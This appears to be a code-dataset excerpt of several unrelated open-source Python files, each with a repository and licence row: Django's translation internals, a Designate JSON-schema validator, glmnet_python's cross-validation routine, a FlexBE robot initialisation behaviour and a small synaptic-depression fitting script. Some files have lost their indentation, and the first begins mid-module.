return res.encode(self.django_output_charset)
def translation(language):
"""
Returns a translation object.
This translation object will be constructed out of multiple GNUTranslations
objects by merging their catalogs. It will construct a object for the
requested language and add a fallback to the default language, if it's
different from the requested language.
"""
global _translations
t = _translations.get(language, None)
if t is not None:
return t
from django.conf import settings
# set up the right translation class
klass = DjangoTranslation
if sys.version_info < (2, 4):
klass = DjangoTranslation23
globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
if settings.SETTINGS_MODULE is not None:
parts = settings.SETTINGS_MODULE.split('.')
project = import_module(parts[0])
projectpath = os.path.join(os.path.dirname(project.__file__), 'locale')
else:
projectpath = None
def _fetch(lang, fallback=None):
global _translations
loc = to_locale(lang)
res = _translations.get(lang, None)
if res is not None:
return res
def _translation(path):
try:
t = gettext_module.translation('django', path, [loc], klass)
t.set_language(lang)
return t
except IOError, e:
return None
res = _translation(globalpath)
# We want to ensure that, for example, "en-gb" and "en-us" don't share
# the same translation object (thus, merging en-us with a local update
# doesn't affect en-gb), even though they will both use the core "en"
# translation. So we have to subvert Python's internal gettext caching.
base_lang = lambda x: x.split('-', 1)[0]
if base_lang(lang) in [base_lang(trans) for trans in _translations]:
res._info = res._info.copy()
res._catalog = res._catalog.copy()
def _merge(path):
t = _translation(path)
if t is not None:
if res is None:
return t
else:
res.merge(t)
return res
for localepath in settings.LOCALE_PATHS:
if os.path.isdir(localepath):
res = _merge(localepath)
if projectpath and os.path.isdir(projectpath):
res = _merge(projectpath)
for appname in settings.INSTALLED_APPS:
app = import_module(appname)
apppath = os.path.join(os.path.dirname(app.__file__), 'locale')
if os.path.isdir(apppath):
res = _merge(apppath)
if res is None:
if fallback is not None:
res = fallback
else:
return gettext_module.NullTranslations()
_translations[lang] = res
return res
default_translation = _fetch(settings.LANGUAGE_CODE)
current_translation = _fetch(language, fallback=default_translation)
return current_translation
def activate(language):
"""
Fetches the translation object for a given tuple of application name and
language and installs it as the current translation object for the current
thread.
"""
_active[currentThread()] = translation(language)
def deactivate():
"""
Deinstalls the currently active translation object so that further _ calls
will resolve against the default translation object, again.
"""
global _active
if currentThread() in _active:
del _active[currentThread()]
def deactivate_all():
"""
Makes the active translation object a NullTranslations() instance. This is
useful when we want delayed translations to appear as the original string
for some reason.
"""
_active[currentThread()] = gettext_module.NullTranslations()
def get_language():
"""Returns the currently selected language."""
t = _active.get(currentThread(), None)
if t is not None:
try:
return to_language(t.language())
except AttributeError:
pass
# If we don't have a real translation object, assume it's the default language.
from django.conf import settings
return settings.LANGUAGE_CODE
def get_language_bidi():
"""
Returns selected language's BiDi layout.
False = left-to-right layout
True = right-to-left layout
"""
from django.conf import settings
base_lang = get_language().split('-')[0]
return base_lang in settings.LANGUAGES_BIDI
def catalog():
"""
Returns the current active catalog for further processing.
This can be used if you need to modify the catalog or want to access the
whole message catalog instead of just translating one string.
"""
global _default, _active
t = _active.get(currentThread(), None)
if t is not None:
return t
if _default is None:
from django.conf import settings
_default = translation(settings.LANGUAGE_CODE)
return _default
def do_translate(message, translation_function):
"""
Translates 'message' using the given 'translation_function' name -- which
will be either gettext or ugettext. It uses the current thread to find the
translation object to use. If no current translation is activated, the
message will be run through the default translation object.
"""
global _default, _active
t = _active.get(currentThread(), None)
if t is not None:
result = getattr(t, translation_function)(message)
else:
if _default is None:
from django.conf import settings
_default = translation(settings.LANGUAGE_CODE)
result = getattr(_default, translation_function)(message)
if isinstance(message, SafeData):
return mark_safe(result)
return result
def gettext(message):
return do_translate(message, 'gettext')
def ugettext(message):
return do_translate(message, 'ugettext')
def gettext_noop(message):
"""
Marks strings for translation but doesn't translate them now. This can be
used to store strings in global variables that should stay in the base
language (because they might be used externally) and will be translated
later.
"""
return message
def do_ntranslate(singular, plural, number, translation_function):
global _default, _active
t = _active.get(currentThread(), None)
if t is not None:
return getattr(t, translation_function)(singular, plural, number)
if _default is None:
from django.conf import settings
_default = translation(settings.LANGUAGE_CODE)
return getattr(_default, translation_function)(singular, plural, number)
def ngettext(singular, plural, number):
"""
Returns a UTF-8 bytestring of the translation of either the singular or
plural, based on the number.
"""
return do_ntranslate(singular, plural, number, 'ngettext')
def ungettext(singular, plural, number):
"""
Returns a unicode strings of the translation of either the singular or
plural, based on the number.
"""
return do_ntranslate(singular, plural, number, 'ungettext')
def check_for_language(lang_code):
"""
Checks whether there is a global language file for the given language
code. This is used to decide whether a user-provided language is
available. This is only used for language codes from either the cookies or
session.
"""
from django.conf import settings
globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
if gettext_module.find('django', globalpath, [to_locale(lang_code)]) is not None:
return True
else:
return False
def get_language_from_request(request):
"""
Analyzes the request to find what language the user wants the system to
show. Only languages listed in settings.LANGUAGES are taken into account.
If the user requests a sublanguage where we have a main language, we send
out the main language.
"""
global _accepted
from django.conf import settings
globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
supported = dict(settings.LANGUAGES)
if hasattr(request, 'session'):
lang_code = request.session.get('django_language', None)
if lang_code in supported and lang_code is not None and check_for_language(lang_code):
return lang_code
lang_code = request.COOKIES.get(settings.LANGUAGE_COOKIE_NAME)
if lang_code and lang_code in supported and check_for_language(lang_code):
return lang_code
accept = request.META.get('HTTP_ACCEPT_LANGUAGE', '')
for accept_lang, unused in parse_accept_lang_header(accept):
if accept_lang == '*':
break
# We have a very restricted form for our language files (no encoding
# specifier, since they all must be UTF-8 and only one possible
# language each time. So we avoid the overhead of gettext.find() and
# work out the MO file manually.
# 'normalized' is the root name of the locale in POSIX format (which is
# the format used for the directories holding the MO files).
normalized = locale.locale_alias.get(to_locale(accept_lang, True))
if not normalized:
continue
# Remove the default encoding from locale_alias.
normalized = normalized.split('.')[0]
if normalized in _accepted:
# We've seen this locale before and have an MO file for it, so no
# need to check again.
return _accepted[normalized]
for lang, dirname in ((accept_lang, normalized),
(accept_lang.split('-')[0], normalized.split('_')[0])):
if lang.lower() not in supported:
continue
langfile = os.path.join(globalpath, dirname, 'LC_MESSAGES',
'django.mo')
if os.path.exists(langfile):
_accepted[normalized] = lang
return lang
return settings.LANGUAGE_CODE
def get_date_formats():
"""
Checks whether translation files provide a translation for some technical
message ID to store date and time formats. If it doesn't contain one, the
formats provided in the settings will be used.
"""
from django.conf import settings
date_format = ugettext('DATE_FORMAT')
datetime_format = ugettext('DATETIME_FORMAT')
time_format = ugettext('TIME_FORMAT')
if date_format == 'DATE_FORMAT':
date_format = settings.DATE_FORMAT
if datetime_format == 'DATETIME_FORMAT':
datetime_format = settings.DATETIME_FORMAT
if time_format == 'TIME_FORMAT':
time_format = settings.TIME_FORMAT
return date_format, datetime_format, time_format
def get_partial_date_formats():
"""
Checks whether translation files provide a translation for some technical
message ID to store partial date formats. If it doesn't contain one, the
formats provided in the settings will be used.
"""
from django.conf import settings
year_month_format = ugettext('YEAR_MONTH_FORMAT')
month_day_format = ugettext('MONTH_DAY_FORMAT')
if year_month_format == 'YEAR_MONTH_FORMAT':
year_month_format = settings.YEAR_MONTH_FORMAT
if month_day_format == 'MONTH_DAY_FORMAT':
month_day_format = settings.MONTH_DAY_FORMAT
return year_month_format, month_day_format
dot_re = re.compile(r'\S')
def blankout(src, char):
"""
Changes every non-whitespace character to the given char.
Used in the templatize function.
"""
return dot_re.sub(char, src)
inline_re = re.compile(r"""^\s*trans\s+((?:".*?")|(?:'.*?'))\s*""")
block_re = re.compile(r"""^\s*blocktrans(?:\s+|$)""")
endblock_re = re.compile(r"""^\s*endblocktrans$""")
plural_re = re.compile(r"""^\s*plural$""")
constant_re = re.compile(r"""_\(((?:".*?")|(?:'.*?'))\)""")
def templatize(src):
"""
Turns a Django template into something that is understood by xgettext. It
does so by translating the Django translation tags into standard gettext
function invocations.
"""
from django.template import Lexer, TOKEN_TEXT, TOKEN_VAR, TOKEN_BLOCK
out = StringIO()
intrans = False
inplural = False
singular = []
plural = []
for t in Lexer(src, None).tokenize():
if intrans:
if t.token_type == TOKEN_BLOCK:
endbmatch = endblock_re.match(t.contents)
pluralmatch = plural_re.match(t.contents)
if endbmatch:
if inplural:
out.write(' ngettext(%r,%r,count) ' % (''.join(singular), ''.join(plural)))
for part in singular:
out.write(blankout(part, 'S'))
for part in plural:
out.write(blankout(part, 'P'))
else:
out.write(' gettext(%r) ' % ''.join(singular))
for part in singular:
out.write(blankout(part, 'S'))
intrans = False
inplural = False
singular = []
plural = []
elif pluralmatch:
inplural = True
else:
raise SyntaxError("Translation blocks must not include other block tags: %s" % t.contents)
elif t.token_type == TOKEN_VAR:
if inplural:
plural.append('%%(%s)s' % t.contents)
else:
singular.append('%%(%s)s' % t.contents)
elif t.token_type == TOKEN_TEXT:
if inplural:
plural.append(t.contents)
else:
singular.append(t.contents)
else:
if t.token_type == TOKEN_BLOCK:
imatch = inline_re.match(t.contents)
bmatch = block_re.match(t.contents)
cmatches = constant_re.findall(t.contents)
if imatch:
g = imatch.group(1)
if g[0] == '"': g = g.strip('"')
elif g[0] == "'": g = g.strip("'")
out.write(' gettext(%r) ' % g)
elif bmatch:
for fmatch in constant_re.findall(t.contents):
out.write(' _(%s) ' % fmatch)
intrans = True
inplural = False
singular = []
plural = []
elif cmatches:
for cmatch in cmatches:
out.write(' _(%s) ' % cmatch)
else:
out.write(blankout(t.contents, 'B'))
elif t.token_type == TOKEN_VAR:
parts = t.contents.split('|')
cmatch = constant_re.match(parts[0])
if cmatch:
out.write(' _(%s) ' % cmatch.group(1))
for p in parts[1:]:
if p.find(':_(') >= 0:
out.write(' %s ' % p.split(':',1)[1])
else:
out.write(blankout(p, 'F'))
else:
out.write(blankout(t.contents, 'X'))
return out.getvalue()
def parse_accept_lang_header(lang_string):
"""
Parses the lang_string, which is the body of an HTTP Accept-Language
header, and returns a list of (lang, q-value), ordered by 'q' values.
Any format errors in lang_string results in an empty list being returned.
"""
result = []
pieces = accept_language_re.split(lang_string)
if pieces[-1]:
return []
for i in range(0, len(pieces) - 1, 3):
first, lang, priority = pieces[i : i + 3]
if first:
return []
priority = priority and float(priority) or 1.0
result.append((lang, priority))
result.sort(lambda x, y: -cmp(x[1], y[1]))
return result
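# --- Illustrative sketch (not part of the original module) ---
# A hedged example of the Accept-Language parser above: entries come back as
# (language, q-value) pairs sorted by descending quality, and a malformed
# header yields an empty list. The header value is purely illustrative.
def _accept_lang_example():
    parsed = parse_accept_lang_header('da, en-gb;q=0.8, en;q=0.7')
    # parsed == [('da', 1.0), ('en-gb', 0.8), ('en', 0.7)]
    return parsed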
| greggian/TapdIn | django/utils/translation/trans_real.py | Python | apache-2.0 | 20,192 | 0.00213 |
def get_file_extension(filename):
return filename.split(".")[-1]
| finiteloopsoftware/django-compressor | compress/utils.py | Python | bsd-3-clause | 69 | 0 |
# Copyright 2012 Managed I.T.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from designate import exceptions
from designate.schema import format
from designate.schema import resolvers
from designate.schema import validators
from designate import utils
LOG = logging.getLogger(__name__)
class Schema(object):
def __init__(self, version, name):
self.raw_schema = utils.load_schema(version, name)
self.resolver = resolvers.LocalResolver.from_schema(
version, self.raw_schema)
if version in ['v2', 'admin']:
self.validator = validators.Draft4Validator(
self.raw_schema, resolver=self.resolver,
format_checker=format.draft4_format_checker)
else:
raise Exception('Unknown API version: %s' % version)
@property
def schema(self):
return self.validator.schema
@property
def properties(self):
return self.schema['properties']
@property
def links(self):
return self.schema['links']
@property
def raw(self):
return self.raw_schema
def validate(self, obj):
LOG.debug('Validating values: %r' % obj)
errors = []
for error in self.validator.iter_errors(obj):
errors.append({
'path': ".".join([str(x) for x in error.path]),
'message': error.message,
'validator': error.validator
})
if len(errors) > 0:
LOG.debug('Errors in validation: %r' % errors)
raise exceptions.InvalidObject("Provided object does not match "
"schema", errors=errors)
def filter(self, instance, properties=None):
if not properties:
properties = self.properties
filtered = {}
for name, subschema in list(properties.items()):
if 'type' in subschema and subschema['type'] == 'array':
subinstance = instance.get(name, None)
filtered[name] = self._filter_array(subinstance, subschema)
elif 'type' in subschema and subschema['type'] == 'object':
subinstance = instance.get(name, None)
properties = subschema['properties']
filtered[name] = self.filter(subinstance, properties)
else:
filtered[name] = instance.get(name, None)
return filtered
def _filter_array(self, instance, schema):
if 'items' in schema and isinstance(schema['items'], list):
# NOTE(kiall): We currently don't make use of this..
raise NotImplementedError()
elif 'items' in schema:
schema = schema['items']
if '$ref' in schema:
with self.resolver.resolving(schema['$ref']) as ischema:
schema = ischema
properties = schema['properties']
return [self.filter(i, properties) for i in instance]
elif 'properties' in schema:
schema = schema['properties']
with self.resolver.resolving(schema['$ref']) as ischema:
schema = ischema
return [self.filter(i, schema) for i in instance]
else:
raise NotImplementedError('Can\'t filter unknown array type')
| openstack/designate | designate/schema/__init__.py | Python | apache-2.0 | 3,897 | 0 |
# -*- coding: utf-8 -*-
"""
--------------------------------------------------------------------------
cvglmnet.m: cross-validation for glmnet
--------------------------------------------------------------------------
DESCRIPTION:
Does k-fold cross-validation for glmnet, produces a plot, and returns
a value for lambdau. Cross-validation is not implemented for Cox model yet.
USAGE:
 Note that, like glmnet, all arguments are keyword-only:
 CVerr = cvglmnet(x = x, y = y, family = family, ptype = ptype, nfolds = nfolds,
                  foldid = foldid, parallel = parallel, keep = keep,
                  grouped = grouped, **options)
 Fewer input arguments (the more common case) are allowed in the call; default
 values for the arguments are used unless specified by the user.
=======================
INPUT ARGUMENTS
x nobs x nvar scipy 2D array of x parameters (as in glmnet).
y nobs x nc scipy Response y as in glmnet.
family Response type as family in glmnet.
options Options as in glmnet.
ptype loss to use for cross-validation. Currently five options, not
all available for all models. The default is ptype='deviance', which uses
squared-error for Gaussian models (a.k.a ptype='mse' there), deviance for
logistic and Poisson regression, and partial-likelihood for the Cox
model (Note that CV for cox model is not implemented yet).
ptype='class' applies to binomial and multinomial logistic
regression only, and gives misclassification error. ptype='auc' is for
two-class logistic regression only, and gives area under the ROC curve.
ptype='mse' or ptype='mae' (mean absolute error) can be used by all models
except the 'cox'; they measure the deviation from the fitted mean to the
response.
nfolds number of folds - default is 10. Although nfolds can be as
large as the sample size (leave-one-out CV), it is not recommended for
large datasets. Smallest value allowable is nfolds=3.
foldid an optional vector of values between 1 and nfold identifying
what fold each observation is in. If supplied, nfold can be
missing.
parallel If True, use parallel computation to fit each fold.
keep If keep=True, a prevalidated array is returned containing
fitted values for each observation and each value of lambda.
This means these fits are computed with this observation and
the rest of its fold omitted. The foldid vector is also
returned. Default is keep=False.
grouped This is an experimental argument, with default true, and can
be ignored by most users. For all models except the 'cox',
this refers to computing nfolds separate statistics, and then
using their mean and estimated standard error to describe the
CV curve. If grouped=false, an error matrix is built up at
the observation level from the predictions from the nfold
fits, and then summarized (does not apply to
type='auc'). For the 'cox' family, grouped=true obtains the
CV partial likelihood for the Kth fold by subtraction; by
subtracting the log partial likelihood evaluated on the full
 dataset from that evaluated on the (K-1)/K dataset. 
This makes more efficient use of risk sets. With
grouped=FALSE the log partial likelihood is computed only on
the Kth fold.
=======================
OUTPUT ARGUMENTS:
A dict() is returned with the following fields.
lambdau the values of lambda used in the fits.
cvm the mean cross-validated error - a vector of length
length(lambdau).
cvsd estimate of standard error of cvm.
cvup upper curve = cvm+cvsd.
cvlo lower curve = cvm-cvsd.
nzero number of non-zero coefficients at each lambda.
name a text string indicating type of measure (for plotting
purposes).
glmnet_fit a fitted glmnet object for the full data.
lambda_min value of lambda that gives minimum cvm.
lambda_1se largest value of lambda such that error is within 1 standard
error of the minimum.
class Type of regression - internal usage.
fit_preval if keep=true, this is the array of prevalidated fits. Some
entries can be NA, if that and subsequent values of lambda
are not reached for that fold.
foldid if keep=true, the fold assignments used.
DETAILS:
The function runs glmnet nfolds+1 times; the first to get the lambda
sequence, and then the remainder to compute the fit with each of the
folds omitted. The error is accumulated, and the average error and
standard deviation over the folds is computed. Note that cvglmnet
does NOT search for values for alpha. A specific value should be
supplied, else alpha=1 is assumed by default. If users would like to
cross-validate alpha as well, they should call cvglmnet with a
pre-computed vector foldid, and then use this same fold vector in
separate calls to cvglmnet with different values of alpha.
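    For example (an illustrative sketch: it assumes x and y shaped as in the
    Gaussian example below, and that alpha is forwarded to glmnetSet through
    **options), reuse one foldid vector across calls:
        foldid = scipy.random.choice(10, 100)
        cvfit_lasso = cvglmnet(x = x, y = y, foldid = foldid, alpha = 1.0)
        cvfit_enet = cvglmnet(x = x, y = y, foldid = foldid, alpha = 0.5)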
LICENSE: GPL-2
AUTHORS:
Algorithm was designed by Jerome Friedman, Trevor Hastie and Rob Tibshirani
Fortran code was written by Jerome Friedman
 R wrapper (from which the MATLAB wrapper was adapted) was written by Trevor Hastie
The original MATLAB wrapper was written by Hui Jiang,
and is updated and maintained by Junyang Qian.
This Python wrapper (adapted from the Matlab and R wrappers) is written by Balakumar B.J.,
Department of Statistics, Stanford University, Stanford, California, USA.
REFERENCES:
Friedman, J., Hastie, T. and Tibshirani, R. (2008) Regularization Paths for Generalized Linear Models via Coordinate Descent,
http://www.jstatsoft.org/v33/i01/
Journal of Statistical Software, Vol. 33(1), 1-22 Feb 2010
Simon, N., Friedman, J., Hastie, T., Tibshirani, R. (2011) Regularization Paths for Cox's Proportional Hazards Model via Coordinate Descent,
http://www.jstatsoft.org/v39/i05/
Journal of Statistical Software, Vol. 39(5) 1-13
Tibshirani, Robert., Bien, J., Friedman, J.,Hastie, T.,Simon, N.,Taylor, J. and Tibshirani, Ryan. (2010) Strong Rules for Discarding Predictors in Lasso-type Problems,
http://www-stat.stanford.edu/~tibs/ftp/strong.pdf
Stanford Statistics Technical Report
SEE ALSO:
cvglmnetPlot, cvglmnetCoef, cvglmnetPredict, and glmnet.
EXAMPLES:
# Gaussian
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100, 1)
cvfit = cvglmnet(x = x, y = y)
cvglmnetPlot(cvfit)
print( cvglmnetCoef(cvfit) )
print( cvglmnetPredict(cvfit, x[0:5, :], 'lambda_min') )
cvfit1 = cvglmnet(x = x, y = y, ptype = 'mae')
cvglmnetPlot(cvfit1)
# Binomial
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,1)
y = (y > 0.5)*1.0
fit = cvglmnet(x = x, y = y, family = 'binomial', ptype = 'class')
cvglmnetPlot(fit)
# poisson
x = scipy.random.rand(100,10)
y = scipy.random.poisson(size = [100, 1])*1.0
cvfit = cvglmnet(x = x, y = y, family = 'poisson')
cvglmnetPlot(cvfit)
# Multivariate Gaussian:
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,3)
cvfit = cvglmnet(x = x, y = y, family = 'mgaussian')
cvglmnetPlot(cvfit)
# Multinomial
x = scipy.random.rand(100,10)
y = scipy.random.rand(100,1)
y[y < 0.3] = 1.0
y[y < 0.6] = 2.0
y[y < 1.0] = 3.0
cvfit = cvglmnet(x = x, y = y, family = 'multinomial')
cvglmnetPlot(cvfit)
#cox
Not implemented for cvglmnet.py
% Cox
n=1000;p=30;
nzc=p/3;
x=randn(n,p);
beta=randn(nzc,1);
fx=x(:,1:nzc)*beta/3;
hx=exp(fx);
ty=exprnd(1./hx,n,1);
tcens=binornd(1,0.3,n,1);
y=cat(2,ty,1-tcens);
foldid=randsample(10,n,true);
fit1_cv=cvglmnet(x,y,'cox',[],[],[],foldid);
cvglmnetPlot(fit1_cv);
% Parallel
matlabpool;
x=randn(1e3,100);
y=randn(1e3,1);
tic;
cvglmnet(x,y);
toc;
tic;
cvglmnet(x,y,[],[],[],[],[],true);
toc;
"""
import sys
import joblib
import multiprocessing
from glmnetSet import glmnetSet
from glmnetPredict import glmnetPredict
import scipy
from glmnet import glmnet
from cvelnet import cvelnet
from cvlognet import cvlognet
from cvmultnet import cvmultnet
from cvmrelnet import cvmrelnet
from cvfishnet import cvfishnet
def cvglmnet(*, x,
y,
family = 'gaussian',
ptype = 'default',
nfolds = 10,
foldid = scipy.empty([0]),
parallel = False,
keep = False,
grouped = True,
**options):
options = glmnetSet(options)
if 0 < len(options['lambdau']) < 2:
raise ValueError('Need more than one value of lambda for cv.glmnet')
nobs = x.shape[0]
# we should not really need this. user must supply the right shape
# if y.shape[0] != nobs:
# y = scipy.transpose(y)
# convert 1d python array of size nobs to 2d python array of size nobs x 1
if len(y.shape) == 1:
y = scipy.reshape(y, [y.size, 1])
# we should not really need this. user must supply the right shape
# if (len(options['offset']) > 0) and (options['offset'].shape[0] != nobs):
# options['offset'] = scipy.transpose(options['offset'])
if len(options['weights']) == 0:
options['weights'] = scipy.ones([nobs, 1], dtype = scipy.float64)
# main call to glmnet
glmfit = glmnet(x = x, y = y, family = family, **options)
is_offset = glmfit['offset']
options['lambdau'] = glmfit['lambdau']
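    # From the full-data fit, count the non-zero coefficients at each lambda;
    # multi-response families are reduced to a single count per lambda value.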
nz = glmnetPredict(glmfit, scipy.empty([0]), scipy.empty([0]), 'nonzero')
if glmfit['class'] == 'multnet':
nnz = scipy.zeros([len(options['lambdau']), len(nz)])
for i in range(len(nz)):
nnz[:, i] = scipy.transpose(scipy.sum(nz[i], axis = 0))
nz = scipy.ceil(scipy.median(nnz, axis = 1))
elif glmfit['class'] == 'mrelnet':
nz = scipy.transpose(scipy.sum(nz[0], axis = 0))
else:
nz = scipy.transpose(scipy.sum(nz, axis = 0))
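    # If the user did not supply foldid, build a balanced random assignment of
    # the nobs observations to folds 0..nfolds-1; otherwise infer nfolds from
    # the supplied vector.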
if len(foldid) == 0:
ma = scipy.tile(scipy.arange(nfolds), [1, scipy.floor(nobs/nfolds)])
mb = scipy.arange(scipy.mod(nobs, nfolds))
mb = scipy.reshape(mb, [1, mb.size])
population = scipy.append(ma, mb, axis = 1)
mc = scipy.random.permutation(len(population))
mc = mc[0:nobs]
foldid = population[mc]
foldid = scipy.reshape(foldid, [foldid.size,])
else:
nfolds = scipy.amax(foldid) + 1
if nfolds < 3:
raise ValueError('nfolds must be bigger than 3; nfolds = 10 recommended')
cpredmat = list()
foldid = scipy.reshape(foldid, [foldid.size, ])
if parallel == True:
num_cores = multiprocessing.cpu_count()
sys.stderr.write("[status]\tParallel glmnet cv with " + str(num_cores) + " cores\n")
cpredmat = joblib.Parallel(n_jobs=num_cores)(joblib.delayed(doCV)(i, x, y, family, foldid, nfolds, is_offset, **options) for i in range(nfolds))
else:
for i in range(nfolds):
newFit = doCV(i, x, y, family, foldid, nfolds, is_offset, **options)
cpredmat.append(newFit)
if cpredmat[0]['class'] == 'elnet':
cvstuff = cvelnet( cpredmat, options['lambdau'], x, y \
, options['weights'], options['offset'] \
, foldid, ptype, grouped, keep)
elif cpredmat[0]['class'] == 'lognet':
cvstuff = cvlognet(cpredmat, options['lambdau'], x, y \
, options['weights'], options['offset'] \
, foldid, ptype, grouped, keep)
elif cpredmat[0]['class'] == 'multnet':
cvstuff = cvmultnet(cpredmat, options['lambdau'], x, y \
, options['weights'], options['offset'] \
, foldid, ptype, grouped, keep)
elif cpredmat[0]['class'] == 'mrelnet':
cvstuff = cvmrelnet(cpredmat, options['lambdau'], x, y \
, options['weights'], options['offset'] \
, foldid, ptype, grouped, keep)
elif cpredmat[0]['class'] == 'fishnet':
cvstuff = cvfishnet(cpredmat, options['lambdau'], x, y \
, options['weights'], options['offset'] \
, foldid, ptype, grouped, keep)
elif cpredmat[0]['class'] == 'coxnet':
raise NotImplementedError('Cross-validation for coxnet not implemented yet.')
#cvstuff = cvcoxnet(cpredmat, options['lambdau'], x, y \
# , options['weights'], options['offset'] \
# , foldid, ptype, grouped, keep)
cvm = cvstuff['cvm']
cvsd = cvstuff['cvsd']
cvname = cvstuff['name']
CVerr = dict()
CVerr['lambdau'] = options['lambdau']
CVerr['cvm'] = scipy.transpose(cvm)
CVerr['cvsd'] = scipy.transpose(cvsd)
CVerr['cvup'] = scipy.transpose(cvm + cvsd)
CVerr['cvlo'] = scipy.transpose(cvm - cvsd)
CVerr['nzero'] = nz
CVerr['name'] = cvname
CVerr['glmnet_fit'] = glmfit
if keep:
CVerr['fit_preval'] = cvstuff['fit_preval']
CVerr['foldid'] = foldid
if ptype == 'auc':
cvm = -cvm
CVerr['lambda_min'] = scipy.amax(options['lambdau'][cvm <= scipy.amin(cvm)]).reshape([1])
idmin = options['lambdau'] == CVerr['lambda_min']
semin = cvm[idmin] + cvsd[idmin]
CVerr['lambda_1se'] = scipy.amax(options['lambdau'][cvm <= semin]).reshape([1])
CVerr['class'] = 'cvglmnet'
return(CVerr)
# end of cvglmnet
#==========================
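# doCV fits glmnet on all observations outside fold i, reusing the lambda
# sequence from the full-data fit (passed in through options).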
def doCV(i, x, y, family, foldid, nfolds, is_offset, **options):
which = foldid == i
opts = options.copy()
opts['weights'] = opts['weights'][~which, ]
opts['lambdau'] = options['lambdau']
if is_offset:
if opts['offset'].size > 0:
opts['offset'] = opts['offset'][~which, ]
xr = x[~which, ]
yr = y[~which, ]
newFit = glmnet(x = xr, y = yr, family = family, **opts)
return(newFit)
|
hanfang/glmnet_python
|
glmnet_python/cvglmnet.py
|
Python
|
gpl-2.0
| 14,450
| 0.010242
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from sara_flexbe_states.sara_set_head_angle import SaraSetHeadAngle
from sara_flexbe_states.run_trajectory import RunTrajectory
from sara_flexbe_states.set_gripper_state import SetGripperState
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Thu Jul 27 2017
@author: Redouane Laref Nicolas Nadeau
'''
class Init_SequenceSM(Behavior):
'''
Initialisation Sequence
'''
def __init__(self):
super(Init_SequenceSM, self).__init__()
self.name = 'Init_Sequence'
# parameters of this behavior
# references to used behaviors
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
# [/MANUAL_INIT]
# Behavior comments:
def create(self):
# x:976 y:64, x:973 y:289
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
# [/MANUAL_CREATE]
with _state_machine:
# x:42 y:72
OperatableStateMachine.add('INIT HEAD',
SaraSetHeadAngle(pitch=0.4, yaw=0),
transitions={'done': 'repos'},
autonomy={'done': Autonomy.Off})
# x:205 y:72
OperatableStateMachine.add('repos',
RunTrajectory(file="repos", duration=0),
transitions={'done': 'opengrip'},
autonomy={'done': Autonomy.Off})
# x:506 y:86
OperatableStateMachine.add('opengrip',
SetGripperState(width=0.1, effort=0),
transitions={'object': 'finished', 'no_object': 'finished'},
autonomy={'object': Autonomy.Off, 'no_object': Autonomy.Off},
remapping={'object_size': 'object_size'})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
# [/MANUAL_FUNC]
|
WalkingMachine/sara_behaviors
|
sara_flexbe_behaviors/src/sara_flexbe_behaviors/init_sequence_sm.py
|
Python
|
bsd-3-clause
| 2,331
| 0.023595
|
import numpy as np
import matplotlib.pyplot as plt
from math import exp
size = 9
dt = 50.0 # ms
dt_2 = 550.0
# Vectors to fit
x_fit = np.zeros(size)
V_max_fit = np.zeros(size)
V0_fit = np.zeros(size)
# Parameters of the model
tau_rec = 1000.0 # ms
tau_mem = 32.0 # ms
tau_in = 1.8 # ms
A = 144.0
u = 0.26
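# The recursion below appears to implement a Tsodyks-Markram-style model of
# short-term synaptic depression (interpretation inferred from the parameter
# names): the resource variable x recovers towards 1 with time constant
# tau_rec and is depleted by a fraction u at each stimulus; V0 and V_max then
# describe the resulting PSP shaped by tau_in and tau_mem.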
# First we will fit x
x_fit[0] = 1
for i in range(size - 2):
    x_fit[i+1] = (x_fit[i] * (1 - u) * exp(-dt / tau_rec)
                  + 1 - exp(-dt / tau_rec))
# Last value of x_fit (uses the longer inter-stimulus interval dt_2)
x_fit[-1] = (x_fit[-2] * (1 - u) * exp(-dt_2 / tau_rec)
             + 1 - exp(-dt_2 / tau_rec))
# We calculate alpha fit
alpha_fit = u * A * x_fit
# Now we calculate V_0 and V_max
V0_fit[0] = 0
tau_diff = tau_in - tau_mem
for k in range(size - 1):
ex1 = exp(-dt / tau_in)
ex2 = exp(-dt / tau_mem)
print 'ex1 ex2', ex1, ex2
problem = ex1 - ex2
print 'problem', problem
this = alpha_fit[k] * tau_in / tau_diff
print 'this', this
that = V0_fit[k] * exp(-dt / tau_mem)
print 'that', that
V0_fit[k + 1] = that + this * problem
for k in range(size - 1):
aux2 = (alpha_fit[k] * tau_in - V0_fit[k] * tau_diff)
#print 'aux', aux2
    aux = alpha_fit[k] * tau_mem / aux2
V_max_fit[k] = alpha_fit[k] * (aux ** (tau_mem / tau_diff))
# The final values
ex1 = np.exp(-dt_2 / tau_in)
ex2 = np.exp(-dt_2 / tau_mem)
print 'ex1 ex2', ex1, ex2
problem = ex1 - ex2
this = alpha_fit[-2] * tau_in / tau_diff
that = V0_fit[-2] * exp(-dt_2 / tau_mem)
V0_fit[-1] = that + this * problem
aux = alpha_fit[-1] * tau_mem / (alpha_fit[-1]
* tau_in - V0_fit[-1] * tau_diff)
V_max_fit[-1] = alpha_fit[-1] * (aux ** (tau_mem / tau_diff))
amp_fit = V_max_fit - V0_fit
# Finally we plot
plt.subplot(1, 2, 1)
plt.plot(x_fit, '*-', label='x_fit')
plt.legend()
